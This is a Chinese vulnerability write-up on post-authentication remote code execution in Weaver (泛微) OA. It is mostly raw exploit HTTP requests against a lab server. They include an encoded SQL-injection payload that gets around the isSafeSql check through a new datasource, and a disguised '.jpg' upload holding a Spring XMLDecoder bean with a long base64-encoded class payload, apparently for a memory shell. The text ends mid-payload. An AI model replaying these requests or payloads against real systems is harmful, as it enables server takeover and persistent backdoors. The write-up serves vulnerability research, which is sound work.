泛微后台RCE漏洞

admin
admin
admin
0
文章
0
评论
2025-12-30 01:24:47 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文档披露了泛微OA系统后台远程代码执行漏洞的利用细节。攻击者可通过移动端设计器接口进行SQL注入并绕过安全检测,或利用文件上传接口上传恶意XML文件触发SpringXMLDecoder漏洞。此外,文章详细介绍了利用JDBC数据源更新接口加载恶意驱动类实现RCE的方法,并提供了内存马注入的实操建议。该内容展示了完整的攻击链分析,具备较高的技术参考价值。 综合评分: 88 文章分类: 漏洞分析,漏洞POC,WEB安全,渗透测试

POST /api/mobilemode/admin/designer/saveHomepageContent%20HTTP/1.1Host: 192.168.188.133Content-Length: 2678X-Requested-With:%20XMLHttpRequestAccept-Language:%20zh-CN,zh;q=0.9Accept:%20application/json,%20text/javascript,%20*/*;%20q=0.01Content-Type:%20application/x-www-form-urlencoded;%20charset=UTF-8User-Agent:%20Mozilla/5.0 (Windows%20NT 10.0;%20Win64;%20x64)%20AppleWebKit/537.36 (KHTML,%20like%20Gecko)%20Chrome/138.0.0.0 Safari/537.36Origin:%20http://192.168.188.133Referer:%20http://192.168.188.133/mobilemode/admin/appDesigner.jsp?appid=1Accept-Encoding:%20gzip,%20deflate,%20brCookie:%20ecology_JSessionid=aaaMDiWTJbN8q-hTlFlHz;%20JSESSIONID=aaaMDiWTJbN8q-hTlFlHz;%20loginidweaver=1;%20languageidweaver=7;%20loginuuids=1;%20__randcode__=8baff628-3ec6-493e-bcee-ed120a32cce8Connection:%20keep-alive
id=20&appid=1&mobiledeviceid=1&parentId=20&config=123%2C34%2C111%2C110%2C108%2C111%2C97%2C100%2C83%2C99%2C114%2C105%2C112%2C116%2C34%2C58%2C34%2C34%2C44%2C34%2C99%2C115%2C115%2C65550%2C65552%2C65554%2C106%2C97%2C118%2C97%2C115%2C65545%2C65547%2C65549%2C65551%2C77%2C111%2C98%2C105%2C108%2C101%2C95%2C78%2C83%2C46%2C83%2C81%2C76%2C40%2C92%2C34%2C105%2C110%2C115%2C101%2C114%2C116%2C32%2C65587%2C116%2C111%2C32%2C100%2C97%2C116%2C65565%2C111%2C117%2C114%2C99%2C65576%2C116%2C121%2C112%2C101%2C40%2C100%2C98%2C65607%2C65609%2C44%2C65597%2C98%2C110%2C97%2C109%2C101%2C65616%2C100%2C65546%2C118%2C65590%2C99%2C108%2C65565%2C115%2C65623%2C65625%2C65590%2C65603%2C108%2C41%2C32%2C65564%2C108%2C117%2C101%2C115%2C32%2C40%2C32%2C65646%2C39%2C115%2C113%2C108%2C65589%2C114%2C65626%2C114%2C50%2C48%2C48%2C49%2C49%2C50%2C55%2C51%2C57%2C56%2C51%2C49%2C57%2C49%2C39%2C65616%2C65647%2C65649%2C65651%2C65590%2C65654%2C65656%2C65658%2C65670%2C65646%2C32%2C39%2C99%2C111%2C109%2C46%2C104%2C105%2C103%2C104%2C103%2C111%2C46%2C106%2C65612%2C99%2C46%2C68%2C65633%2C114%2C65679%2C65647%2C65694%2C98%2C99%2C58%2C65687%2C65689%2C65691%2C58%2C47%2C65711%2C63%2C115%2C111%2C99%2C107%2C101%2C116%2C70%2C97%2C99%2C65595%2C114%2C121%2C61%2C111%2C114%2C103%2C46%2C115%2C112%2C65546%2C110%2C103%2C102%2C114%2C65620%2C101%2C119%2C65727%2C107%2C46%2C65683%2C110%2C116%2C101%2C120%2C116%2C65730%2C117%2C112%2C112%2C65727%2C65749%2C67%2C65629%2C65557%2C80%2C65599%2C104%2C88%2C109%2C108%2C65%2C65752%2C108%2C105%2C99%2C65599%2C105%2C65538%2C67%2C65538%2C65746%2C65748%2C38%2C65714%2C65716%2C65718%2C65720%2C65722%2C65727%2C121%2C65%2C65728%2C61%2C102%2C65574%2C101%2C65710%2C65711%2C67%2C65710%2C87%2C69%2C65%2C86%2C69%2C82%2C47%2C101%2C65683%2C65540%2C103%2C121%2C47%2C112%2C97%2C103%2C101%2C47%2C114%2C65642%2C65602%2C65604%2C65811%2C117%2C65652%2C65788%2C65575%2C47%2C98%2C103%2C50%2C49%2C53%2C48%2C65693%2C112%2C103%2C39%2C32%2C41%2C59%2C32%2C65585%2C65616%2C65585%2C65746%2C115%2C116%2C49%2C65837%2C32%2C102%2C117%2C110%2C65722%2C65771%2C110%2C40%2C65813%2C115%2C117%2C108%2C116%2C65637%2C123%2C92%2C110%2C65680%2C32%2C47%2C42%2C32%2C65853%2C65855%2C116%2C91%2C48%2C93%2C46%2C65619%2C65621%2C65835%2C32%2C109%2C97%2C121%2C32%2C98%2C101%2C65836%2C34%2C88%2C65886%2C65585%2C32%2C42%2C47%2C65860%2C65862%2C65862%2C65860%2C125%2C65834%2C65553%2C34%2C65589%2C65744%2C65598%2C65724%2C86%2C97%2C65767%2C65598%2C116%2C65850%2C65559%2C65898%2C112%2C65855%2C108%2C84%2C111%2C82%2C101%2C65736%2C65642%2C104%2C65550%2C65536%2C101%2C65619%2C98%2C65575%2C100%2C65559%2C48%2C65911%2C65640%2C103%2C65587%2C65558%2C58%2C91%2C93%2C125%2C65554%2C65808%2C65810%2C82%2C111%2C65600%2C65908%2C65538%2C65910%2C125&components=91%2C93

点击预览

会调用到

http://192.168.188.133/mobilemode/mobile/server.jsp?invoker=Y29tLmFwaS5tb2JpbGVtb2RlLndlYi5tb2JpbGUuc2VydmljZS5Nb2JpbGVDb21tb25BY3Rpb24=&&_ec_ismobile=true

POST /mobilemode/mobile/server.jsp?invoker=Y29tLmFwaS5tb2JpbGVtb2RlLndlYi5tb2JpbGUuc2VydmljZS5Nb2JpbGVDb21tb25BY3Rpb24=&&_ec_ismobile=true%20HTTP/1.1Host: 192.168.188.133Content-Length: 855X-Requested-With:%20XMLHttpRequestAccept-Language:%20zh-CN,zh;q=0.9Accept:%20*/*Content-Type:%20application/x-www-form-urlencodedUser-Agent:%20Mozilla/5.0 (Windows%20NT 10.0;%20Win64;%20x64)%20AppleWebKit/537.36 (KHTML,%20like%20Gecko)%20Chrome/138.0.0.0 Safari/537.36Origin:%20http://192.168.188.133Referer:%20http://192.168.188.133/mobilemode/admin/appThumbnail.jsp?appHomepageId=20&_logEnabled=false&_mm_billid=a898e5d51ea4439095c86ed1b05e3bcb&timestamp=1754398295573Accept-Encoding:%20gzip,%20deflate,%20brCookie:%20ecology_JSessionid=aaaMDiWTJbN8q-hTlFlHz;%20JSESSIONID=aaaMDiWTJbN8q-hTlFlHz;%20loginidweaver=1;%20languageidweaver=7;%20loginuuids=1;%20__randcode__=8baff628-3ec6-493e-bcee-ed120a32cce8Connection:%20keep-alive
pageKey=adc02359198749a28fae954ded791427_20&_logEnabled=false&billid=a898e5d51ea4439095c86ed1b05e3bcb&timestamp=1754398295573&action=runSQL&content=6B48A55D2DC0EDE0F88274F4A2C4C9A6AAE33062FF6EBE9939842B342B32EAD3DAF0FCAC4039BD892CA327C0A20EF427B9CDBF71D53634F5937D24FF4474926C27009C63C7E50AEF0085A0362E1FE64728AD0F41DC84FB7A76F5F1414FB049203A95016152479EFD156B49ADA76A55408368A8C085531E7A2E423E54C3B71CB746094B811734B0A7257887D9FAE2B881EB791F91EC168E10CEE14C27116CD1A8AB89EDC2217A1D7D66002613C0C34D960EBED9D9980391D4FF8F658BA2EEAD8978F38369B0B69E8A29CE4679D08FE70D12083DB63FB1E640BFDC4575E9359D17CA15A529424B3CC5DBBFF9FB8CA1F8AB70A2BF3B549A6EC17A57BE5BC473C66E8FAB72378246978CA09CE736FDE71A267B9EA857B7AB424CA185A0AF0FD66D92562D507912DB1350C7331516A82095142FEAF5680708B8052E6389350205C21CD9320C725FAFAB4F73FDB579F51E3CF4&datasource=test1&sqlParams=91%2C93

invoker=Y29tLmFwaS5tb2JpbGVtb2RlLndlYi5tb2JpbGUuc2VydmljZS5Nb2JpbGVDb21tb25BY3Rpb24=

解码后为com.api.mobilemode.web.mobile.service.MobileCommonAction

进入isSafeSql会对sql语句进行检测

新建个数据源即可绕过

这里执行insert插入语句

查询数据库,成功插入

将会多出

文件上传

/api/portal/materialLib/uploadFile

POST%20/api/portal/materialLib/uploadFile%20HTTP/1.1User-Agent:%20PostmanRuntime/7.45.0Accept:%20*/*Postman-Token:%2042051550-3621-4edd-a985-cad7386c16acHost:%20192.168.188.133Accept-Encoding:%20gzip,%20deflate,%20brConnection:%20keep-aliveCookie:%20ecology_JSessionid=aaaMDiWTJbN8q-hTlFlHz;%20JSESSIONID=aaaMDiWTJbN8q-hTlFlHz;%20loginidweaver=1;%20languageidweaver=7;%20loginuuids=1;%20__randcode__=a5495ebe-ed73-4efd-83e1-28bfcefd7066Content-Type:%20multipart/form-data;%20boundary=--------------------------193514854705890041356021Content-Length:%2025917
----------------------------193514854705890041356021Content-Disposition:%20form-data;%20name="file";%20filename="bg2025.jpg"Content-Type: text/plain
<?xml version="1.0"&nbsp;encoding="UTF-8"?><!DOCTYPE&nbsp;beans&nbsp;PUBLIC&nbsp;"-//SPRING//DTD BEAN 2.0//EN""http://www.springframework.org/dtd/spring-beans-2.0.dtd"><beans>&nbsp;&nbsp;<bean&nbsp;id="decoder"&nbsp;class="java.beans.XMLDecoder"&nbsp;init-method="readObject">&nbsp; &nbsp;&nbsp;<constructor-arg>&nbsp; &nbsp; &nbsp;&nbsp;<bean&nbsp;class="java.io.ByteArrayInputStream">&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<constructor-arg>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<bean&nbsp;class="javax.xml.bind.DatatypeConverter"&nbsp;factory-method="parseBase64Binary">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<constructor-arg&nbsp;value="PGphdmEgdmVyc2lvbj0iMS44LjAiIGNsYXNzPSJqYXZhLmJlYW5zLlhNTERlY29kZXIiPgogICAgPG9iamVjdCBjbGFzcz0iY29tLnN1bi5vcmcuYXBhY2hlLnhtbC5pbnRlcm5hbC5zZWN1cml0eS51dGlscy5CYXNlNjQiIG1ldGhvZD0iZGVjb2RlIiBpZD0iYnl0ZUNvZGUiPgogICAgICAgIDxzdHJpbmc+PCFbQ0RBVEFbeXY2NnZnQUFBREVCZlFFQUhHOXlaeTloY0dGamFHVXZiRzluWjJsdVp5OXBMMWhOVEZWMGFXd0hBQUVCQUJCcVlYWmhMMnhoYm1jdlQySnFaV04wQndBREFRQU5aMlYwVlhKc1VHRjBkR1Z5YmdFQUZDZ3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFFUTI5a1pRRUFBaThxQ0FBSUFRQU1aMlYwUTJ4aGMzTk9ZVzFsQVFBc2IzSm5MbUZ3WVdOb1pTNWpiMjF0YjI1ekxsZGxZbE52WTJ0bGRGVndaM0poWkdWUGFIRkdhV3gwWlhJSUFBc0JBQTluWlhSQ1lYTmxOalJUZEhKcGJtY0JBQXBGZUdObGNIUnBiMjV6QVFBVGFtRjJZUzlwYnk5SlQwVjRZMlZ3ZEdsdmJnY0FEd0VBRUdwaGRtRXZiR0Z1Wnk5VGRISnBibWNIQUJFQkVIUklOSE5KUVVGQlFVRkJRVUZCU2pGWlF6TjRZbFpTYmk5dWVWUk9WR1JRY3pGaVFrZ3hjakJ2WWtWMVluUjFiVEppYlhwa1p6ZFlaRmxJVms1T09WazVOMEZpU1dKWWNtSmFhM1ZVVGt4dWNERjJiRmRHVFZGdWFXYzRWWEF3TlhoUWFFUklRblZ1UzBKUFdVeEdSVkpGVlVKQlVqTXJPRWh2Y1V0cFUxQXlabVV5TDFOT1IyczNPVTVtTW01dVVGQXJVamN2TjNwMlpqazFNM1k1YzBkWU4zSTBXSGRCY2xKSmJFRlVWQzlaUnpGWlVXRTNkRTlETkZob0wyWjZlVmREZFRkVWRXcHlhVFJWVDJGMmFXWlNiVEZUTjNSU01UbEJOV1JHYjNKeFYxWkRRVVZhYURsVlFqbFdaMVpKTXpGQ2JIVnBZV2x5VmtacFkwcDBLM2REUmpocGRFazRSMVZzYUhsTllXNXZkM2t4VVdrMFRuZFJhVlZZTUZSUlNqSm1PVlpsUVZWa1RIWkdjMVJ0VGtWWGFWZHVkRFptTkhWTVlteGlOMWx3ZVhCaWQzUkliR0ZxWlRsV2ExSk1OV0pwZHpZNVREVkpVM0ZIZGpkWU4wTjFPVEJEUW5sM01FaHdaM1pOT1Rka1RtbEljVGxDUTA5UFEzTjVaRnBHT0V0dFUyMUdaVVZyZWxKMFMyaEtlVTk0TTNWYU1FcEhjVmxRZEhWT1QxWkxUa2t3Ums5aFZWRm9TbVZZVFdjMk9GVk9jM2x1VERsU1JWRnZkREZET1ZRMmFYZHRjbWx3V1hOTVVsTjRRVUYxYkc5cldEQTBhVVowZVVsTmJIQnpaMHhDVm5nMk0wTlViVWRtYVV4U1drUXpTV3gzYzJWYVpWTjBOemszZEdORGVXdzJWMkpxVFhab1pERk9TbXhhZDFvMlowd3dNa0pWVFVFdkswSTFjWEJEY2pZd1dITkpWemNyUkdwUlRFWkVWM0ptV0hkbVNUQk9aVzh2TUhKaE0wWklRalp6ZDBWeWNEUldWMVZsTUZKQlNXUXpLMHR6Ym5aSVUxQmtaV2xUYzBwbVVrbFFTMkpuUlhCTFJuRmlOMDVxVEZaM1kybHBhSGcwVFhSclZWRm1abU5SYWtkR1UxUkVaRzUwUVcxYWRVTjVTVkl2Wm5waWNqWkVaVlZzUldkU1JVZFVkMHhSVDFoUk1HWkRjV3RLUzNkVWRGUldjemRZVG1oRGJ6TnZNWFpVVjFjd2RGWlpiVTEwVm1zemNYaEZTbXRJYkN0R2VVNDFjWGhVVjBSNFQwbEtWVkZuYzBoUE4xSjNWWFJQTTJFd1RXUm1SbEIzUTI5SFdtaFpTVlowVUVkbmNXSTFOVk5PWkc5b2MwNVFURE51VVdwb01YVm9URVJVT1ZCQlJXTlFZa3RIVGpkc2VHNWFNR3RGYlcxdlUxSjBUbE5zVkZkcWFXUnFUMmhFVVdGdk1sTlFaR2R5TUZNMWFuZG1Va2hpT0hORmJFOXFSRVpvTlRGR1NsaEtMMkpNZWxGTlEwTjNkbGxSTVc5eGNHWmFjVmQ1U3psWGEzRnViaXN5TUdoekwxRnNkRlYxZGtWeFoxbG5jSEZDWVhKQmFYTnVSR05TU1dRd2NVWm9UamR5UVZKSVNrZDBWbWwyTTIxa1ZXd3hXVkJsZEVGeVdHTktNMXA2Y2xKeVpYRmhSMVpYVFZCb2NEUkZTV05yVmpsVGNWWnpSaXRXWlRoTVRtdGtObGN5VHpZeGFYUlFVREJoTW1KclQwaENkMjV3TTBNMFRWTkNLekF3WjIxSFRERk9kWGhMU0V4RVIybGtTazVWUjBwalZtaENiM05sTXpoT1kxUTNZVzlMWXpKRVNWcHRRMGxpUkdGbFRIRTBjMHRhYUdGNWVITnNUVVUxUW1Gc2ExTlRTbkZyZVVrMWRuRlVjelpFY1c5b1lWZFVibUZaV1dkV2ExUTFTMFpOYUVSWVRYaEROa2RUYzIxblIyc3hjbFpyZWxad1psWkpkRXMzV2xsSVdHaE1ZWHBEUW1OM1MzSnhVSEZ1Ym1sNVdHVXdiakE1VEhwV1NYQnpSM0k0VGs0M2FIaFFaRFIxTkVkaFVWZHphR1JsUTJaQ1NIbG5hVll2UW5WblZreFRhRlJUT1V3NE5Hb3pSSGxDYkcxTE1tWk1NVXB5VTJSTFVIZFNUa05SVW5kSk9UUnlRV0o1VUdGWU1tY3lSakJMTTJrNGQySjZTakpDVWl0clVIbFBlSGRtWjJodGNucFBXRGgzTDJkamFYRTBhVlZRWW5OaFNETm1aMUZRYWtsMVp6Z3haRUpTT0RGTk9XZHhhVlkzTDFKSU56aEhSRGQxZUdwR09GRnRRelphYW1oNGRERllZbGhtWjJ0WmVWZFdhblJZTVZJeFRHaDFkV0Z0YW5FeldrZExTMlppTWxjMGVHSlVSRmszVm5BdlJWZFJkek5qUTI0MVJtVXJhWHBPVG1OWE56aElhMlZYWVRWSlJYQmtURnB5TmpoUmQxVlBLMDUyUnpNcmEyUTFjbWhNUnpCcVRFeEtlSE5PTlZkblNrc3hkekkxVkdFd2NXUkhXWE5pVG5VeVVVMXVOR3hpYWpablUxRXhOalZRZW0xbFMyaHlWbVYwVm05VmVtcE5WM0JDU0dSWmIxWjJXV1F2VGtSMkx6WklZVnBhZUhkYU1VaFpkME00WlV4c2RtMXFTbkJOTnpCemVtdDRVMXBRU2tJMlZYUmlWWEJ0VmxOSWRVbzFTVFl6VXpod2RtSk1WRVY0VWtsaWJVbHdjME50VUd3eFVFSk1abmd3VjBaVGVVNVNhbnBYUms1dE5UUmhOWGwxUWxKV1VEZHJjRzFaUjNVckwweE1URXBJWTNwalJHdDBNM056VWs4MFYzWnBWREphUWt4S09HTm1kMFZoVm5wSlNHOTZRVXRwY0d4NVpVSmFUVnBoVDBNck0yd3pWRWR0VTJkdE9Fa3JRMkV4VW1OSFJFeEZhM1o1ZDFGR016Skxaamd2UzBGTEwyY3llakptY1dzeFdIZElVWFk0Y0VwSGFUUk1kVmQ1ZGsxSWIwbE1TRzFZWkRsdGRYZDZXbUZZTVRSUWRHMW5MMWRGVjFKdE0wZFVjMlV2UVVRclRXcDVUWEExYW1aS2RrWmxWMk4zT1dWT2NXc3ZhRVZRUzJoNVVEWm1VVTVWTjJScFdFdFFZbkI1V1Rkd1F6bFpSRGxhV0RkbVptZDRMMmxLZGtsR0syRndZbTlxYlhoSlZpOXhjbnBvWmxWSWRuZGpkalZCZDJaemJtSnBOM2MzTVZOUmFEWjRUR1p5TURFNGRqaHNaR0V4ZFRBM1RGVXlkMk5WYURJMGFtWTBabVY1Y0daNVJFSTJkWGhTY3pjcmVFRkNUbkZGVGxJNWRIZDFMMDV1VlRCTFUxUnZlWE4wVENzdmVqbGhjVFV5ZGxsWUwweFZUV29yU25aNlRERnpiRlJZTjJWRldsVmpZVE5PZEdab0wzaDZPV3RUWm5sdWFFOU1NVzlDV2pGamRscDJOR3RwVG5jM1JqaEJhSGRVTTBGd2MwVjJOa1JzZVZOUlZWUnZObXRtVmxWNWFWZEZaRTVUYjBjME9Gb3plVkkxV1ZwS2JUVmxkbGg0YTBwRU9FcE9jRmh5TmpJeldETktLMGRJV21sd2NqbHVSa1JqZDJsc1kzTnZXVkJ3VGxadlUycFpha1Y1UkZvM2VFWjFWV05pWWxKSWFrMXRUbkpJVW10d05sa3lOMWRIZDNwcmJtSlVSREpzYW5aRlpGQkdha1JKT0VsdFlWTlFjRmgxVTJ4clprWllVRGh5VWxBeVQzRktZMlZDYkZJMGIwcHpkSG8xWlc1cFRHMXpSVUZrYkhaTlEyaEhVRTV4V21kdVprYzBlRlk0ZVZoc09UVlRiekptUzNCYVdraE1TbEZPTWtkT2FXdFJaWFozVjNRMVMyMUpTbVJqY2l0TGFWRnhZekF6UkM4emN6ZFRWbVpsVEdrMGRYY3dUbWxoVmtneVZ6aFNOVm8zU1RoNk9HcFhTRmhyWWxaaVNVdFNPVmRxVWpKWVZISkdhMlJ0SzNrdkswb3hiSEIzZFV4aU1qQjZVbHBKZFVWWFUxRnRVM3BPTmxvMFpYVmlURU5VVFRSamVGTnlXbXBvYjNaTWEwWTFhWGQwVG5SdGNHcFFUbGxVTmxSVmRWWlZPVkF6WjNKeU9GWlVNRUp0UVdscVFTdDRhVzEzU1ZJME1sQmtRbVp0YzFoc1drWldObW94V0dWMFZtUmxSbFkyZUdWMVlrcENaRmx0VG5CSFdrSXdOVWxUTVhGVlRXdE9NRWhxZHpSalEyZ3ZWM2RwTjFKb1FYVmFUV2MwVVV4RmNGRkxjamhXUVdKcWExWTJPSGhNYWtaSFNWVjFZMDFVTlhScVIxZGpPRk5QWkhveFN5dE9Wa2RETkU5cGRFaHpZVTFoY1M5WlprSmxaVFZPUWpoR05UWTFaemh6TW5WUWJWVnRVVzFMU3pabVEwMXpORGhLWjNaSVlWbGFaMlp4TldJMGNVdHJiRXhVTVRGWlJtaFlSRUpsTTJ4dVRUWlNla2N6Ums5dmVVZEVlRXRXVkhsdFkwZDVUVFpuSzJwYWIzaFlaRTVvTlM5T2FWTnNLMHRKU2xsYUszVmhXVTFwTVRsamFtRk1WMDVvTm5sTVNtaGhaRFZKVWpCcGNUQjFjVUZRV0VSMlRVSndUelZyVVRaRVltaFdaV0ZLUzJNMlNrdHhZVlJsUlUxWGVXRkpiRFpuYUhkUGFtOUllWEpYWmxFeWJEWTNORWRaYjJwb1RuZHNTbnBHT1dzMFJDdENXR3hYTkdWNFR6Uk9XREZuV1hsMVVFcHJkWHBvY0hGUFFtNVBPVmxUZGpsMFVWWk5TbTVyUzB4eFZXTnVVR0pVT1ZkRmMwbHhRVEJSUkRrMWVHTllXV1JIVld4alVqQnVjSE5OVDNkUE5VbEJSbUZHUnpsSlZGZEJWR0pwVlU1RE1tTnJNbTlWVFN0Q1VWbEdUM2RYVTJvNFRVcFRVRlZYTjJ4eU0waFRURVZaZUVZelduSlZWa3QwVGxWTVJXSjRiRXBsZDNsT09XRkxkQzlLYjNvd1JVa3hNV0pVVEhwclkydG5Melo2YVVoak5tRnFTa2xFYVUwNVl6SlpSMUo2U2pSa1VuUmFVV2RHY0hGUk0xWTVTSHBYTUd0Vk9HWXZSRTVTYlhSamRFZFJNbFZXV1ZSamVUQjBjVU5RZVUxcFRqSTNUbmx5TlU5d1ZqRnNiSFZPU1V4U1VtOXhjazlTVDBka1ZqZFpVbk5zUjNoRFNDdHRjR2RLYkd4WFNXaEJVWFJYYnpGSlFqUTBVVGxHZGxBMFFqSm9iWFpLTTJsWVRqUlVkMWt6TVZoRU9GRkJZVE4wVG1SdFkweDZPRlUwTlRkalNESnVkbGg0ZWtJM1pIRXJXRXR6TURFM1RpdFRNMjVGUzBsa05qbHlURkF5TW5kYUwwTTFVbTltVUVsV2JIVjVNbVo0VDFsd05GTm9iMlJPUmpaSE9UQmFjMHB5UVcxRVJVUlFUMWRGYkVSM05EQjNjMWwyV2tKamRWSjNWekpyVnpSdVMxWjBTblZhTUhKaVlsRnZVa28wWkRWSGNraEpTelIzU0V4UFRucHhkV2RaTVRaSU1YaHpkVmR2Y3pNMFNUSlZSVzFKUzNsRVZVaFBWM1YwZEZOaVJ6WktkWE5SUkcxRFRqbFBTakJ2UjBSMVJHSnVkME52V2tod2RVNUpPRGcyWTBwUmVEVTNSR1Z3VkM5c01tZHpheTgwU1UxSFdUVmpkMlV6Tkc5MWJHY3lNakV3VERKSFNrSlpSbnBsVEdwU1ZWaE5UMnA2VTFjclFucFdaQ3RNU2tWbWVsRm9kblo0WWs0MFlrbzRPV3M0VEU5aU9GcFVVRTFaU21aRFZGRTJjVE13VDBwMlowbG1iWFJFUW00NWMxWkxjRGxwYWpKRVduaHpWbTQzVURoMVVrVTRZamhOUkhGS1ZIcHpOMEl4VFhScFQxb3ZSRU5OVURkc1ZYcEtOR05aVTFadE0wWTFaemd2YUVaVVlXWk5hVXh6WkhCNlJsazFNMFIzZEVodmVYWkhabmN2V0hreFJYQlFXVVZoYWlzMmVIZGtkbkpqZHpaTU1GQnNLM0I2TlZWU01DOWFlR1JDYUdwNVdXbFpTbGhCUzA1WVdVZHpTbWxrUlZKWEt6QnZlRmxyVGpKdmJIVlRUR1ZtVEZCdWFFVlllWE13WTNaVFV5OXBRM051VlVaWlluRkNhMUo1ZVZOdllWa3pUemROYzJSU1NHdHFhblZPVjNwemVuaE9UMUZrVUdseldFUkJZM2h1T0NzNVJFNWFPV3RRTDBGRFYwa3ZPWGMzZDNOTEwydHpWaTlHYmpaeldqRk9aWGN2VmtWd2IxcHplV1ZwYkVadk5XOWxlWFY2UkVOQk4yaDVObmxzYWpaTlpsUjVSMGMxZUVGWVpHbFRSa1Y1YTNoSVdXVndTMU15T0VkQ1VWWkhSRXRETmtaeVYycFBVRlZtVTJORWNIQlNVek5NYVV3emJtUlVaR2hNUkU5TlQzZDFaMDgzY2s0eU1XVkphbmszZVdFeVlsaFVkVmRSWVZKUmJHdDFZMjE2WjBkck9DdFhORVUwSzNoTWRXdFNWMGx6TTNSNGJqaDRZbnB6TkZKdFVqRlBUVkZrWm5kV1kxcFJValI0UlRFdlJERjRhek5NVldJNVpEUXpVMDVLWkZKa2FEVlJPRVV3UmtSNWJEUlhUVVZxUTJnMWJFWkJTMnB5UlVOc2F6SXdjamRPU1ZsdlRqazNSVmRWUzJwdk0xTlhZelZwVlc5aGNEQnpkMjlNYWxacE1rMXVLM2hESzNGcFdrMWtjbWh1Um1WT05IRkZkMDVsVlZjcmEzVldaWE4wVEVrM1NreE9ZbkJ5TWxvemQwVjZkbnBtZWpreVZFbExRMjUwZEZZM1VsbE1PVWhDZEd4T1ozVk5lRVZzWjJ4M2FYWlhOVVYyU2pGdmFEaEhWV0pDY25OcmNtcDJUMnhWTVcwdlJrZGFla3hSSzJkcWNtNWpkMGQ0ZFZwVFlreHZPWFpGWmxGWVRGSk5SRWs0UVZwelRrZGFNamQyZEVacVdrZ3ZaRmRuVW5SVWQyTlhWRmxJWTNSbVJHZExha3hhVkROMmRETTJXakoyYTNCMlZXUmpXV3BzYW5SV1JXeGxTRnBxWkRaNE5VbFdObGhrZVVkTGJrZEJhREZ2Y0RGWkwxWkNPRXcwVVdwaWJESkpWMFJSVkdsRWMyaHlla2RKUTNaTlNtUmlia2RNWTJGaGJHbG9ka2RNUkdGV1VqUjRZV0pVY1VSNFpsSjVRbmt6V1dOSVEzaHJNMmswUkM5QmRERjBTRFZzU0VkUlFVRUlBQk1CQUFZOGFXNXBkRDRCQUJVb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tWWU1BQlVBRmdvQUVnQVhBUUFES0NsV0FRQVRhbUYyWVM5c1lXNW5MMFY0WTJWd2RHbHZiZ2NBR2dFQUQweHBibVZPZFcxaVpYSlVZV0pzWlFFQUVreHZZMkZzVm1GeWFXRmliR1ZVWVdKc1pRRUFCbVpwYkhSbGNnRUFFa3hxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQjJOdmJuUmxlSFFCQUFoamIyNTBaWGgwY3dFQUVFeHFZWFpoTDNWMGFXd3ZUR2x6ZERzQkFBUjBhR2x6QVFBZVRHOXlaeTloY0dGamFHVXZiRzluWjJsdVp5OXBMMWhOVEZWMGFXdzdBUUFXVEc5allXeFdZWEpwWVdKc1pWUjVjR1ZVWVdKc1pRRUFKRXhxWVhaaEwzVjBhV3d2VEdsemREeE1hbUYyWVM5c1lXNW5MMDlpYW1WamREcytPd0VBRG1waGRtRXZkWFJwYkM5TWFYTjBCd0FuQVFBU2FtRjJZUzkxZEdsc0wwbDBaWEpoZEc5eUJ3QXBBUUFOVTNSaFkydE5ZWEJVWVdKc1pRd0FGUUFaQ2dBRUFDd0JBQXBuWlhSRGIyNTBaWGgwQVFBU0tDbE1hbUYyWVM5MWRHbHNMMHhwYzNRN0RBQXVBQzhLQUFJQU1BRUFDR2wwWlhKaGRHOXlBUUFXS0NsTWFtRjJZUzkxZEdsc0wwbDBaWEpoZEc5eU93d0FNZ0F6Q3dBb0FEUUJBQWRvWVhOT1pYaDBBUUFES0NsYURBQTJBRGNMQUNvQU9BRUFCRzVsZUhRQkFCUW9LVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd3dBT2dBN0N3QXFBRHdCQUFsblpYUkdhV3gwWlhJQkFDWW9UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd3dBUGdBL0NnQUNBRUFCQUFsaFpHUkdhV3gwWlhJQkFDY29UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVllNQUVJQVF3b0FBZ0JFQVFBVGFtRjJZUzlzWVc1bkwxUm9jbTkzWVdKc1pRY0FSZ0VBRW1acGJIUmxjazFoY0hCcGJtZERiR0Z6Y3dFQUVVeHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0FRQUJaUUVBRlV4cVlYWmhMMnhoYm1jdlJYaGpaWEIwYVc5dU93RUFFV1pwYkhSbGNrMWhjSEJwYm1kSmJYQnNBUUFLZFhKc1VHRjBkR1Z5YmdFQUQyWnBiSFJsY2tOc1lYTnpUbUZ0WlFFQUVreHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFEMnBoZG1FdmJHRnVaeTlEYkdGemN3Y0FVQUVBQ0dkbGRFTnNZWE56QVFBVEtDbE1hbUYyWVM5c1lXNW5MME5zWVhOek93d0FVZ0JUQ2dBRUFGUUJBQWRuWlhST1lXMWxEQUJXQUFZS0FGRUFWd0VBQ21selNXNXFaV04wWldRQkFDY29UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVm9NQUZrQVdnb0FBZ0JiQVFBUWFtRjJZUzlzWVc1bkwxUm9jbVZoWkFjQVhRRUFEV04xY25KbGJuUlVhSEpsWVdRQkFCUW9LVXhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd3dBWHdCZ0NnQmVBR0VCQUJWblpYUkRiMjUwWlhoMFEyeGhjM05NYjJGa1pYSUJBQmtvS1V4cVlYWmhMMnhoYm1jdlEyeGhjM05NYjJGa1pYSTdEQUJqQUdRS0FGNEFaUUVBS0dOdmJTNWpZWFZqYUc4dWMyVnlkbVZ5TG1ScGMzQmhkR05vTGtacGJIUmxjazFoY0hCcGJtY0lBR2NCQUJWcVlYWmhMMnhoYm1jdlEyeGhjM05NYjJGa1pYSUhBR2tCQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdEQUJyQUd3S0FHb0FiUUVBRG1kbGRFTnNZWE56VEc5aFpHVnlEQUJ2QUdRS0FGRUFjQUVBQzI